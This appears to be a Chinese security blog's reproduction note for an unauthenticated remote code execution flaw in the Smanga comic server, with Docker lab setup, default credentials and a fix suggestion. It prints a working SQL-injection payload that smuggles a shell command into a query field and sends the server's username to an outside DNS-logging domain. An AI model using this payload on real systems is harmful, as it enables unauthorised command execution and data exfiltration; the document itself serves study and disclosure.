免责申明:本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与本平台和发布者无关!!!

漏洞名称

Smanga 未授权远程代码执行漏洞

漏洞描述

smanaga 是一款docker直装的漫画浏览器。Smanga版本3.2.7及之前版本中存在远程命令执行漏洞。/php/manga/delete.php接口处存在未授权远程代码执行漏洞,攻击者可在目标主机执行任意命令,获取服务器权限。

靶场搭建

Smanga的github地址如下 

https://github.com/lkw199711/smanga

下面使用docker安装smanga

拉取镜像

docker pull lkw199711/smanga:3.2.6

启动容器

docker run -itd --name smanga \
-p 3333:3306 \
-p 9797:80 \
-v /mnt:/mnt \
-v /route/smanga:/data \
lkw199711/smanga:3.2.6;

访问服务

http://192.168.30.112:9797/

环境初始化之后跳转到登录页面

默认用户名/密码:smanga/smanga

漏洞复现

payload

mangaId=1 union select * from (select 1)a join (select 2)b join (select 3)c join (select 4)d join (select '\";ping -c 3 `whoami`.357efab8.dns.dnsmap.org.;\"')e join (select 6)f join (select 7)g join (select 8)h join (select 9)i join (select 10)j join (select 11)k join (select 12)l;&deleteFile=true

payload中触发RCE的是第5个联合查询项,执行命令会先获取服务器用户名并携带用户名信息往dnslog域名发送icmp包,测试成功收到dnslog记录,且获取回显信息。


证明漏洞存在

修复建议

建议您更新当前系统或软件至最新版,完成漏洞的修复。